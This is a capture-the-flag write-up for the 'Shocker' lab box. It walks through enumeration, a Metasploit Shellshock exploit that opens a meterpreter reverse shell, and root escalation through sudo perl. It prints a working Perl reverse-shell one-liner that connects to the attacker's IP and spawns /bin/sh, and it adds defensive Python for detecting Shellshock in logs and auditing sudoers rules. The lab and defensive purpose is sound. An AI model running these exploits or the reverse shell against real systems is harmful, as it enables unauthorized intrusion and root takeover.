👽Shocker Writeup
[Perl] [Injection] [Web]

Nmap
-sC: Performs a script scan using the default set of scripts
-sV: Probe open ports to determine service/version info
-O: Enable OS detection
-oA: Output in the three major formats at once
┌──(kali㉿kali)-[~/HTB/shocker]
└─$ sudo nmap -sC -sV -O -oA nmap_shocker 10.10.10.56
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-09 21:11 EST
Nmap scan report for 10.10.10.56
Host is up (0.014s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)
2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
| 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_ 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.92%E=4%D=1/9%OT=80%CT=1%CU=33684%PV=Y%DS=2%DC=I%G=Y%TM=61DB95F2
OS:%P=x86_64-pc-linux-gnu)SEQ(SP=107%GCD=1%ISR=107%TI=Z%CI=I%II=I%TS=8)OPS(
OS:O1=M54BST11NW6%O2=M54BST11NW6%O3=M54BNNT11NW6%O4=M54BST11NW6%O5=M54BST11
OS:NW6%O6=M54BST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN(
OS:R=Y%DF=Y%T=40%W=7210%O=M54BNNSNW6%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS
OS:%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=
OS:Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=
OS:R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T
OS:=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=
OS:S)
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.49 seconds
When we visit http://10.10.10.56/ in a web browser, we are greeted by an image of a very hostile-looking bug.

Gobuster
dir: Uses directory/file enumeration mode
-w: Path to the wordlist
-u: The target URL
-f: Append / to each request
-x: File extension(s) to search for
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -u 10.10.10.56 -f -x php,html
┌──(kali㉿kali)-[~/HTB/shocker]
└─$ gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -u 10.10.10.56 -f -x php,html
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.56
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: php,html
[+] Add Slash: true
[+] Timeout: 10s
===============================================================
2022/01/10 00:00:15 Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 137]
/cgi-bin/ (Status: 403) [Size: 294]
/icons/ (Status: 403) [Size: 292]
DirBuster
Fuzzing for the extensions sh, py and pl using DirBuster.
┌──(kali㉿kali)-[~/HTB/shocker]
└─$ dirbuster
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Starting OWASP DirBuster 1.0-RC1
Input the following fields into DirBuster's GUI:
Target URL
File with list of dirs/files
File extension

Dir found: / - 200
Dir found: /cgi-bin/ - 403
Dir found: /icons/ - 403
File found: /cgi-bin/user.sh - 200
DirBuster managed to find the following shell script:
File found: /cgi-bin/user.sh - 200
Google
https://httpd.apache.org/security/vulnerabilities_24.html appeared as one of the Google search results for the search term 'Apache httpd 2.4.18 cgi-bin vulnerabilities'.
Msfconsole
┌──(kali㉿kali)-[~/HTB/shocker]
└─$ msfconsole
Execute the following to search for a module:
search apache cgi
msf6 > search apache cgi
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/http/apache_normalize_path_rce 2021-05-10 excellent Yes Apache 2.4.49/2.4.50 Traversal RCE
1 auxiliary/scanner/http/apache_normalize_path 2021-05-10 normal No Apache 2.4.49/2.4.50 Traversal RCE scanner
2 exploit/linux/http/apache_druid_js_rce 2021-01-21 excellent Yes Apache Druid 0.20.0 Remote Command Execution
3 exploit/windows/http/tomcat_cgi_cmdlineargs 2019-04-10 excellent Yes Apache Tomcat CGIServlet enableCmdLineArguments Vulnerability
4 exploit/multi/http/apache_mod_cgi_bash_env_exec 2014-09-24 excellent Yes Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)
5 auxiliary/scanner/http/apache_mod_cgi_bash_env 2014-09-24 normal Yes Apache mod_cgi Bash Environment Variable Injection (Shellshock) Scanner
6 auxiliary/dos/http/apache_mod_isapi 2010-03-05 normal No Apache mod_isapi Dangling Pointer
7 exploit/windows/http/php_apache_request_headers_bof 2012-05-08 normal No PHP apache_request_headers Function Buffer Overflow
8 exploit/multi/http/tomcat_jsp_upload_bypass 2017-10-03 excellent Yes Tomcat RCE via JSP Upload Bypass
Interact with a module by name or index. For example info 8, use 8 or use exploit/multi/http/tomcat_jsp_upload_bypass
The module 'apache_mod_cgi_bash_env_exec' will be used.
4 exploit/multi/http/apache_mod_cgi_bash_env_exec 2014-09-24 excellent Yes Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)
Execute the following commands:
use 4
show options
msf6 > use 4
[*] No payload configured, defaulting to linux/x86/meterpreter/reverse_tcp
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > show options
Module options (exploit/multi/http/apache_mod_cgi_bash_env_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
CMD_MAX_LENGTH 2048 yes CMD max line length
CVE CVE-2014-6271 yes CVE to check/exploit (Accepted: CVE-2014-6271, CVE-2014-6278)
HEADER User-Agent yes HTTP header to use
METHOD GET yes HTTP method to use
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPATH /bin yes Target PATH for binaries used by the CmdStager
RPORT 80 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI yes Path to CGI script
TIMEOUT 5 yes HTTP read response timeout (seconds)
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host
Payload options (linux/x86/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.249.135 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Linux x86
Set the required options and run the exploit:
set LHOST 10.10.17.239
set RHOST 10.10.10.56
set TARGETURI /cgi-bin/user.sh
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > set LHOST 10.10.17.239
LHOST => 10.10.17.239
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > set RHOST 10.10.10.56
RHOST => 10.10.10.56
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > set TARGETURI /cgi-bin/user.sh
TARGETURI => /cgi-bin/user.sh
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > run
[*] Started reverse TCP handler on 10.10.17.239:4444
[*] Command Stager progress - 100.46% done (1097/1092 bytes)
[*] Sending stage (984904 bytes) to 10.10.10.56
[*] Meterpreter session 1 opened (10.10.17.239:4444 -> 10.10.10.56:40956 ) at 2022-01-10 02:30:57 -0500
meterpreter >
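From the defender's side, the module above works because Apache's mod_cgi copies request headers such as User-Agent into the CGI script's environment, where a vulnerable bash parses a value beginning with "() {" as a function definition and keeps executing whatever follows it (CVE-2014-6271). Those same headers are written to Apache's combined-format access log, so every attempt leaves a trace. The following Python is an added example and not part of this writeup: it parses combined-format lines (constructed here, not logs taken from the box) and flags the function-definition prefix in the User-Agent and Referer fields, rating hits against /cgi-bin/ that returned 200 highest.

```python
import re

# Constructed sample lines in Apache "combined" log format; not logs from the box.
SAMPLE_LOG = """\
10.10.17.239 - - [10/Jan/2022:02:30:55 -0500] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "-" "Mozilla/5.0"
10.10.17.239 - - [10/Jan/2022:02:30:57 -0500] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "-" "() { :; }; echo Shellshock-test"
10.10.14.5 - - [10/Jan/2022:02:31:02 -0500] "GET /index.html HTTP/1.1" 200 137 "() { :;}; echo test" "curl/7.81.0"
10.10.14.5 - - [10/Jan/2022:02:31:10 -0500] "GET /icons/ HTTP/1.1" 403 292 "-" "Mozilla/5.0"
"""

# Apache "combined" LogFormat: %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i"
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<user_agent>[^"]*)"$'
)

# Shellshock marker: an environment variable value that starts with a bash
# function definition "() {". Whitespace between the tokens is optional.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")


def parse_combined(line):
    """Parse one combined-format line into a dict; returns None if it does not match."""
    m = COMBINED_RE.match(line.rstrip("\n"))
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    parts = rec["request"].split(" ")
    rec["path"] = parts[1] if len(parts) >= 2 else ""
    return rec


def is_shellshock(value):
    """True if a header value carries the bash function-definition prefix."""
    return bool(SHELLSHOCK_RE.search(value))


def find_shellshock_hits(log_text):
    """Return one record per header field that carries a Shellshock-style value."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_combined(line)
        if rec is None:
            continue
        for field in ("user_agent", "referer"):
            if is_shellshock(rec[field]):
                hits.append({
                    "ip": rec["ip"], "ts": rec["ts"], "path": rec["path"],
                    "status": rec["status"], "field": field, "value": rec[field],
                    # Only requests that reach a CGI handler can actually execute.
                    "cgi": rec["path"].startswith("/cgi-bin/"),
                })
    return hits


if __name__ == "__main__":
    for h in find_shellshock_hits(SAMPLE_LOG):
        sev = "HIGH" if h["cgi"] and h["status"] == 200 else "MEDIUM"
        print(f'[{sev}] {h["ts"]} {h["ip"]} {h["path"]} via {h["field"]}: {h["value"]!r}')
```

Running it against a real access log is a matter of `find_shellshock_hits(open("/var/log/apache2/access.log").read())`; the 403 on /cgi-bin/ seen earlier in Gobuster only blocks the directory listing, so the path prefix check, not the status of the directory itself, decides whether a hit is worth treating as execution rather than scanning noise.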
ip a
Execute 'ip a' to find the local host IP address, which is needed for the Metasploit module's 'LHOST' option.
┌──(kali㉿kali)-[~/HTB/shocker]
└─$ ip a
3: tun0: <POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN group default qlen 500
link/none
inet 10.10.17.239/23 scope global tun0
valid_lft forever preferred_lft forever
inet6 dead:beef:4::11ed/64 scope global
valid_lft forever preferred_lft forever
inet6 fe80::d863:fab4:a02d:5afd/64 scope link stable-privacy
valid_lft forever preferred_lft forever
The IP address for LHOST is 10.10.17.239.
inet 10.10.17.239/23 scope global tun0
Meterpreter
Execute the 'shell' command to gain a shell session.
meterpreter > shell
Process 1467 created.
Channel 1 created.
Execute 'whoami'
whoami
shelly
We can use the find command to search for the .txt file that contains the user flag.
find /home -type f -name "*.txt"
/home/shelly/user.txt
cat /home/shelly/user.txt
2ec2****************************
Sudo
-l: list user's privileges or check a specific command
sudo -l
Matching Defaults entries for shelly on Shocker:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User shelly may run the following commands on Shocker:
(root) NOPASSWD: /usr/bin/perl
The user shelly is able to run Perl as root without a password.
(root) NOPASSWD: /usr/bin/perl
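The rule above is the whole privilege escalation: an interpreter with no argument restriction, run as root, is equivalent to granting root outright. The following Python is an added audit example, not part of this writeup, that parses sudoers-style user specification lines (constructed here, not the box's real /etc/sudoers) and flags non-root entries that grant ALL or an unrestricted shell-capable interpreter, noting whether NOPASSWD applies.

```python
import re

# Constructed sudoers-style lines for demonstration; not the box's real /etc/sudoers.
SAMPLE_SUDOERS = """\
# User privilege specification
root    ALL=(ALL:ALL) ALL
shelly  ALL=(root) NOPASSWD: /usr/bin/perl
deploy  ALL=(root) NOPASSWD: /usr/bin/systemctl restart app.service
backup  ALL=(root) /usr/bin/rsync --archive /srv /mnt/backup
"""

# Interpreters and tools that can start a shell or run arbitrary code when invoked
# under sudo with no argument restriction.
SHELL_CAPABLE = {"perl", "python", "python2", "python3", "ruby", "bash", "sh",
                 "dash", "vim", "vi", "nano", "less", "more", "find", "awk", "env"}

# user  host=(runas) [TAG: ...] command[, command...]
RULE_RE = re.compile(
    r"^(?P<user>[^\s#]+)\s+(?P<host>\S+)=\((?P<runas>[^)]*)\)\s*"
    r"(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$"
)


def parse_rule(line):
    """Parse one user specification line; returns None for comments, blanks and non-rules."""
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    m = RULE_RE.match(line)
    if not m:
        return None
    tags = {t.strip(": ") for t in m.group("tags").split(":") if t.strip()}
    cmds = [c.strip() for c in m.group("cmds").split(",") if c.strip()]
    return {"user": m.group("user"), "runas": m.group("runas"),
            "nopasswd": "NOPASSWD" in tags, "cmds": cmds}


def audit_sudoers(text):
    """Return findings for non-root rules that amount to unrestricted root."""
    findings = []
    for line in text.splitlines():
        rule = parse_rule(line)
        if rule is None or rule["user"] == "root":
            continue
        for cmd in rule["cmds"]:
            reasons = []
            if cmd == "ALL":
                reasons.append("any command")
            else:
                binary, *args = cmd.split()
                name = binary.rsplit("/", 1)[-1]
                # An interpreter with fixed arguments is a narrower grant than one without.
                if name in SHELL_CAPABLE and not args:
                    reasons.append(f"{name} can spawn a shell and accepts arbitrary arguments")
            if reasons:
                findings.append({"user": rule["user"], "runas": rule["runas"],
                                 "cmd": cmd, "nopasswd": rule["nopasswd"],
                                 "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in audit_sudoers(SAMPLE_SUDOERS):
        tag = "NOPASSWD" if f["nopasswd"] else "password"
        print(f'{f["user"]} -> ({f["runas"]}) {f["cmd"]} [{tag}]: {"; ".join(f["reasons"])}')
```

Against the constructed input only the shelly rule is reported; the systemctl rule is not, because its arguments are pinned, which is the shape a rule like this should take when a user genuinely needs one privileged action.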
Netcat
Execute 'nc -lvnp 1234' in another terminal to create a listener.
┌──(kali㉿kali)-[~/HTB/shocker]
└─$ nc -lvnp 1234
listening on [any] 1234 ...
Reverse Shell
We are able to get the Perl reverse shell code from https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
Update $i to the local host IP address:
$i="10.10.17.239";
Execute the following command in the Meterpreter shell session.
sudo perl -e 'use Socket;$i="10.10.17.239";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Netcat
Head back to the terminal where we started the Netcat listener.
┌──(kali㉿kali)-[~/HTB/shocker]
└─$ nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.10.17.239] from (UNKNOWN) [10.10.10.56] 41484
/bin/sh: 0: can't access tty; job control turned off
#
Execute 'whoami'
# whoami
root
Let's find and cat the .txt file that contains the root flag.
# find /root -type f -name "*.txt"
/root/root.txt
# cat /root/root.txt
52c2****************************